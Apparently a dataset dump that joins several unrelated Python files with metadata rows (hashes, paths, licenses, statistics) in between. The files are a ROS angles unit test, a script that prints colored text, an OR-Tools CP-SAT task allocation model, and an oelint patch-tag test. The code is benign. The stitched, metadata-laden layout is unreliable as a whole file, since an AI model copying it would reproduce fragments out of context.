        self.assertAlmostEqual(two_pi_complement(-5.0*pi/2.0), 3*pi/2)

    def test_find_min_max_delta(self):
        # Internal helper: given a position and limits, returns a validity
        # flag and the (min, max) allowed angular deltas from that position.
        epsilon = 1e-9
        # Straight forward full range
        flag, min_delta, max_delta = _find_min_max_delta( 0, -pi, pi)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -pi)
        self.assertAlmostEqual(max_delta, pi)
        # pi/2 Full Range
        flag, min_delta, max_delta = _find_min_max_delta( pi/2, -pi, pi)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -3*pi/2)
        self.assertAlmostEqual(max_delta, pi/2)
        # -pi/2 Full range
        flag, min_delta, max_delta = _find_min_max_delta( -pi/2, -pi, pi)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -pi/2)
        self.assertAlmostEqual(max_delta, 3*pi/2)
        # Straight forward partial range
        flag, min_delta, max_delta = _find_min_max_delta( 0, -pi/2, pi/2)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -pi/2)
        self.assertAlmostEqual(max_delta, pi/2)
        # pi/4 Partial Range
        flag, min_delta, max_delta = _find_min_max_delta( pi/4, -pi/2, pi/2)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -3*pi/4)
        self.assertAlmostEqual(max_delta, pi/4)
        # -pi/4 Partial Range
        flag, min_delta, max_delta = _find_min_max_delta( -pi/4, -pi/2, pi/2)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -pi/4)
        self.assertAlmostEqual(max_delta, 3*pi/4)
        # bump stop negative full range
        flag, min_delta, max_delta = _find_min_max_delta( -pi, -pi, pi)
        self.assertTrue(flag)
        self.assertTrue((fabs(min_delta) <= epsilon and fabs(max_delta - 2*pi) <= epsilon) or (fabs(min_delta+2*pi) <= epsilon and fabs(max_delta) <= epsilon))
        self.assertAlmostEqual(min_delta, 0.0)
        self.assertAlmostEqual(max_delta, 2*pi)
        # Inverted limits (lower > upper): wrapped interval.
        flag, min_delta, max_delta = _find_min_max_delta(-0.25,0.25,-0.25)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -2*pi+0.5)
        self.assertAlmostEqual(max_delta, 0.0)
        # bump stop positive full range
        flag, min_delta, max_delta = _find_min_max_delta( pi-epsilon, -pi, pi)
        self.assertTrue(flag)
        #self.assertTrue((fabs(min_delta) <= epsilon and fabs(max_delta - 2*pi) <= epsilon) or (fabs(min_delta+2*pi) <= epsilon and fabs(max_delta) <= epsilon))
        self.assertAlmostEqual(min_delta, -2*pi+epsilon)
        self.assertAlmostEqual(max_delta, epsilon)
        # bump stop negative partial range
        flag, min_delta, max_delta = _find_min_max_delta( -pi, -pi, pi)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, 0)
        self.assertAlmostEqual(max_delta, 2*pi)
        # bump stop positive partial range
        flag, min_delta, max_delta = _find_min_max_delta( -pi/2, -pi/2, pi/2)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, 0.0)
        self.assertAlmostEqual(max_delta, pi)
        # Test out of range negative
        flag, min_delta, max_delta = _find_min_max_delta( -pi, -pi/2, pi/2)
        self.assertFalse(flag)
        # Test out of range positive
        flag, min_delta, max_delta = _find_min_max_delta( pi, -pi/2, pi/2)
        self.assertFalse(flag)
        # pi/4 Partial Range
        flag, min_delta, max_delta = _find_min_max_delta( 3*pi/4, pi/2, -pi/2)
        self.assertTrue(flag)
        self.assertAlmostEqual(min_delta, -pi/4)
        self.assertAlmostEqual(max_delta, 3*pi/4)
if __name__ == '__main__':
    # rosunit is only needed when run as a script, so it is imported lazily;
    # it reports results through the ROS test framework.
    import rosunit
    rosunit.unitrun('angles', 'test_python_angles', TestAngles)
| 47.592233
| 190
| 0.690806
| 1,992
| 14,706
| 4.89006
| 0.104418
| 0.226363
| 0.099168
| 0.072067
| 0.789549
| 0.769018
| 0.759265
| 0.736988
| 0.71892
| 0.659173
| 0
| 0.041326
| 0.192098
| 14,706
| 308
| 191
| 47.746753
| 0.778554
| 0.165307
| 0
| 0.36
| 0
| 0
| 0.002619
| 0
| 0
| 0
| 0
| 0
| 0.72
| 1
| 0.035
| false
| 0
| 0.03
| 0
| 0.07
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b91d92114aad99ab71bcc79c0a5cb6fa118d65de
| 30
|
py
|
Python
|
AULA 11 - Cores no terminal/exemplo 02.py
|
luizhmfonseca/Estudos-Python
|
4ed50835a1fd68d3066fcfa57355e48a2f5e4978
|
[
"MIT"
] | 2
|
2021-03-15T22:07:59.000Z
|
2021-11-09T11:52:37.000Z
|
AULA 11 - Cores no terminal/exemplo 02.py
|
luizhmfonseca/Estudos-Python
|
4ed50835a1fd68d3066fcfa57355e48a2f5e4978
|
[
"MIT"
] | null | null | null |
AULA 11 - Cores no terminal/exemplo 02.py
|
luizhmfonseca/Estudos-Python
|
4ed50835a1fd68d3066fcfa57355e48a2f5e4978
|
[
"MIT"
] | null | null | null |
# '\33[31;43m' is an ANSI escape sequence: foreground red (31) on a
# yellow background (43); the colors apply to the text that follows.
print('\33[31;43mOlá, Mundo!')
| 30
| 30
| 0.666667
| 5
| 30
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.206897
| 0.033333
| 30
| 1
| 30
| 30
| 0.482759
| 0
| 0
| 0
| 0
| 0
| 0.677419
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
b9427eb96bcc6ddaed3c787eeaf300b3a0dd8245
| 11,916
|
py
|
Python
|
examples/python/task_allocation_sat.py
|
sreesubbash/or-tools
|
701496e45d54fa9938afeedec43089314d93ec11
|
[
"Apache-2.0"
] | 1
|
2021-03-30T21:10:27.000Z
|
2021-03-30T21:10:27.000Z
|
examples/python/task_allocation_sat.py
|
sreesubbash/or-tools
|
701496e45d54fa9938afeedec43089314d93ec11
|
[
"Apache-2.0"
] | null | null | null |
examples/python/task_allocation_sat.py
|
sreesubbash/or-tools
|
701496e45d54fa9938afeedec43089314d93ec11
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2010-2018 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CP-SAT model for task allocation problem.
see
http://yetanothermathprogrammingconsultant.blogspot.com/2018/09/minizinc-cpsat-vs-mip.html
"""
from ortools.sat.python import cp_model
def main():
    """Solves the task allocation problem.

    Builds a CP-SAT model that assigns every task to exactly one time
    slot in which it is available, with at most ``capacity`` tasks per
    slot, and minimizes the number of distinct slots used. Prints the
    solver status, objective value and wall time. Returns None.
    """
    # Availability matrix: available[task][slot] == 1 iff `task` may be
    # scheduled in `slot`. Here it is a square 50x50 instance.
    available = [[
        0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1,
        1, 1
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,
        1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1,
        1, 0
    ], [
        0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 1
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 1
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1,
        1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1,
        1, 1
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1,
        1, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,
        1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1,
        1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ], [
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0,
        0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
        0, 0
    ]]
    ntasks = len(available)
    nslots = len(available[0])
    # sets
    all_tasks = range(ntasks)
    all_slots = range(nslots)
    # max tasks per time slot
    capacity = 3
    # Model
    model = cp_model.CpModel()
    # assign[(task, slot)] == 1 iff `task` is scheduled in `slot`.
    assign = {}
    for task in all_tasks:
        for slot in all_slots:
            assign[(task, slot)] = model.NewBoolVar('x[%i][%i]' % (task, slot))
    # count == number of distinct slots used; this is the objective.
    count = model.NewIntVar(0, nslots, 'count')
    # slot_used[s] == 1 iff at least one task is assigned to slot s.
    slot_used = [model.NewBoolVar('slot_used[%i]' % s) for s in all_slots]
    # Each task must be scheduled in exactly one slot where it is available.
    for task in all_tasks:
        model.Add(
            sum(assign[(task, slot)] for slot in all_slots
                if available[task][slot] == 1) == 1)
    for slot in all_slots:
        # No slot may hold more than `capacity` tasks.
        model.Add(
            sum(assign[(task, slot)] for task in all_tasks
                if available[task][slot] == 1) <= capacity)
        # Channeling, direction 1: if the slot is marked used, at least one
        # available task must actually be assigned to it.
        model.AddBoolOr([
            assign[(task, slot)] for task in all_tasks
            if available[task][slot] == 1
        ]).OnlyEnforceIf(slot_used[slot])
        # Channeling, direction 2: if the slot is marked unused, no task may
        # be assigned to it; unavailable pairs are forbidden outright.
        for task in all_tasks:
            if available[task][slot] == 1:
                model.AddImplication(slot_used[slot].Not(),
                                     assign[(task, slot)].Not())
            else:
                model.Add(assign[(task, slot)] == 0)
    model.Add(count == sum(slot_used))
    # Redundant constraint. This instance is easier if we add this constraint.
    # NOTE(review): the bound presumably should be ceil(ntasks / capacity),
    # i.e. use ntasks rather than nslots — they happen to be equal (50) in
    # this instance, so the distinction is moot here. Verify before enabling.
    # model.Add(count >= (nslots + capacity - 1) // capacity)
    model.Minimize(count)
    # Create a solver and solve the problem.
    solver = cp_model.CpSolver()
    # Uses the portfolio of heuristics (parallel search workers).
    solver.parameters.log_search_progress = True
    solver.parameters.num_search_workers = 6
    status = solver.Solve(model)
    print('Statistics')
    print(' - status =', solver.StatusName(status))
    print(' - optimal solution =', solver.ObjectiveValue())
    print(' - wall time : %f s' % solver.WallTime())
# Run the example only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
| 41.519164
| 90
| 0.359852
| 2,867
| 11,916
| 1.484827
| 0.053017
| 1.017618
| 1.490486
| 1.939394
| 0.653982
| 0.630021
| 0.630021
| 0.62086
| 0.62086
| 0.62086
| 0
| 0.350811
| 0.395015
| 11,916
| 286
| 91
| 41.664336
| 0.2397
| 0.082662
| 0
| 0.685714
| 0
| 0
| 0.009083
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004082
| false
| 0
| 0.004082
| 0
| 0.008163
| 0.016327
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b963ff5a9f5c537b8255d3dc4af97da6d1e0a08b
| 2,612
|
py
|
Python
|
tests/test_class_oelint_file_upstreamstatus_inactiveupstream.py
|
skycaptain/oelint-adv
|
ff67d3149cf8b1de2b0b2d158a68f4e2cf5e9e46
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_class_oelint_file_upstreamstatus_inactiveupstream.py
|
skycaptain/oelint-adv
|
ff67d3149cf8b1de2b0b2d158a68f4e2cf5e9e46
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_class_oelint_file_upstreamstatus_inactiveupstream.py
|
skycaptain/oelint-adv
|
ff67d3149cf8b1de2b0b2d158a68f4e2cf5e9e46
|
[
"BSD-2-Clause"
] | null | null | null |
import pytest
from .base import TestBaseClass
class TestClassOelintFileUpstreamStatusInactiveUpstreamDetails(TestBaseClass):
    """Tests for the oelint.file.inactiveupstreamdetails check.

    An ``Upstream-Status: Inactive-Upstream`` tag in a patch file must
    carry ``lastcommit`` and/or ``lastrelease`` details in its brackets.
    """

    @pytest.mark.parametrize('id', ['oelint.file.inactiveupstreamdetails'])
    @pytest.mark.parametrize('occurrence', [1])
    @pytest.mark.parametrize(
        'input',
        [
            # No bracketed details at all.
            {
                'oelint_adv-test.bb': 'SRC_URI = "file://test.patch"',
                'files/test.patch': 'Upstream-Status: Inactive-Upstream',
            },
            # Brackets present but without lastcommit/lastrelease keywords.
            {
                'oelint_adv-test.bb': 'SRC_URI = "file://test.patch"',
                'files/test.patch': 'Upstream-Status: Inactive-Upstream [1234]',
            },
        ],
    )
    def test_bad(self, input, id, occurrence):
        """Each malformed patch must raise the finding exactly once."""
        args = self._create_args(input)
        self.check_for_id(args, id, occurrence)

    @pytest.mark.parametrize('id', ['oelint.file.inactiveupstreamdetails'])
    @pytest.mark.parametrize('occurrence', [0])
    @pytest.mark.parametrize(
        'input',
        [
            # lastcommit detail only.
            {
                'oelint_adv-test.bb': 'SRC_URI = "file://test.patch"',
                'files/test.patch': 'Upstream-Status: Inactive-Upstream [lastcommit 1234]',
            },
            # lastrelease detail only.
            {
                'oelint_adv-test.bb': 'SRC_URI = "file://test.patch"',
                'files/test.patch': 'Upstream-Status: Inactive-Upstream [lastrelease 1234]',
            },
            # Both details together.
            {
                'oelint_adv-test.bb': 'SRC_URI = "file://test.patch"',
                'files/test.patch': 'Upstream-Status: Inactive-Upstream [lastcommit 1234 lastrelease 1234]',
            },
        ],
    )
    def test_good(self, input, id, occurrence):
        """Well-formed details must produce no finding."""
        args = self._create_args(input)
        self.check_for_id(args, id, occurrence)
| 47.490909
| 109
| 0.369832
| 164
| 2,612
| 5.768293
| 0.231707
| 0.095137
| 0.133192
| 0.079281
| 0.824524
| 0.824524
| 0.824524
| 0.824524
| 0.824524
| 0.824524
| 0
| 0.018018
| 0.532542
| 2,612
| 54
| 110
| 48.37037
| 0.756757
| 0
| 0
| 0.469388
| 0
| 0
| 0.255743
| 0.026799
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040816
| false
| 0
| 0.040816
| 0
| 0.102041
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b96794b75cd6b5d3e2b2f64d67142a2d02f92234
